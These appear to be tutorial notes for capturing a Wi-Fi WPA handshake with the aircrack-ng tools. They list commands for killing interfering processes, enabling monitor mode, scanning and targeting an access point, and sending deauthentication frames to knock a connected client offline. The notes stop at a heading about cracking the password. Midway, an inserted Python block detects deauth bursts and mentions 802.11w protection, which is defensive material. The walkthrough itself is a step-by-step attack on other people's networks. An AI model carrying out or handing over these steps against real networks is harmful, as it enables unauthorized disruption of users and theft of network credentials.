Check if our Wi-Fi Card is connected to our host

iwconfig

Check for running processes that could interfere with what we are about to do, and kill them

airmon-ng check kill

Placing our card into Monitor Mode

airmon-ng start wlan0

<aside> 💡 Monitor Mode allows our wireless card to perform monitoring of all the incoming traffic and that's going to allow us to eavesdrop, listen in and hopefully gather that handshake.

</aside>

To find the wireless networks

airodump-ng wlan0mon

BSSID: MAC address of the access point

PWR: Power level - the closer the negative number is to zero, the closer we are to that device

Beacons, #Data, #/s: Show us how much traffic there is, or how much data is being transferred

CH: Channel - wireless (1-14). The big channels are 1, 6 and 11, as they don't overlap, but it varies between 2.4 GHz and 5 GHz

ESSID: Name of each network. Our card can also find hidden networks.

To capture the information from a specific device and store it in a file

airodump-ng -c 6 --bssid 50:C7:BF:8A:00:73 -w capture wlan0mon

-c: Channel

-w: To save the output into a file

We can't get any handshake. Let's try to deauth a device

aireplay-ng -0 1 -a 50:C7:BF:8A:00:73 -c 3C:F0:11:22:dDB:E3 wlan0mon

-0: Zero - means deauth

1: Run only one time

-a: MAC address of the AP

-c: Station - the client we are attacking (select a device that is connected to the target network)

Sometimes we can't capture the handshake even after deauthing a device. Then we need to try a different user or wait for the right person; try deauthing someone who is close to you.
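Seen from the monitoring side, the deauth step above is a burst of 802.11 deauthentication frames aimed at one client. The following added example (not part of the original notes) parses such frames and flags bursts per BSSID/station pair; the sample frames, MAC addresses, window and threshold are constructed assumptions, and frames are assumed to start at the 802.11 header with the radiotap header already stripped.

```python
import struct
from collections import defaultdict, deque

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if (version, ftype, subtype) != (0, 0, 12):   # management / deauthentication
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def deauth_alerts(frames, window=10.0, threshold=5):
    """frames: (timestamp, raw 802.11 bytes). Return (bssid, station) pairs
    that saw >= threshold deauth frames within `window` seconds."""
    recent, alerts = defaultdict(deque), set()
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        station = dst if src == bssid else src    # the non-AP side of the pair
        q = recent[(bssid, station)]
        q.append(ts)
        while ts - q[0] > window:                 # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add((bssid, station))
    return sorted(alerts)

def build_deauth(dst, src, bssid, reason=7, seq=0):
    """Construct a sample deauth frame (test data only, no radiotap, no FCS)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (struct.pack("<BBH", 0xC0, 0x00, 0) + raw(dst) + raw(src) + raw(bssid)
            + struct.pack("<HH", seq << 4, reason))

# Constructed sample traffic; the MAC addresses are made-up, locally administered values.
AP, STA, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(i * 0.1, build_deauth(STA, AP, AP, seq=i)) for i in range(8)]   # burst at one client
SAMPLE.append((30.0, build_deauth(AP, OTHER, AP, reason=3)))   # a single ordinary disconnect
SAMPLE.append((31.0, b"\x80\x00" + bytes(24)))                 # beacon-type frame, ignored

if __name__ == "__main__":
    for bssid, station in deauth_alerts(SAMPLE):
        print(f"deauth burst: BSSID {bssid} station {station}")
```

Networks that enforce 802.11w Protected Management Frames make clients discard unauthenticated deauth frames; a detector like this covers networks where that is not enforced.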

We ran our scan a lot of times to capture the hash. Let's see all our capture files

ls capture*

Cracking the Password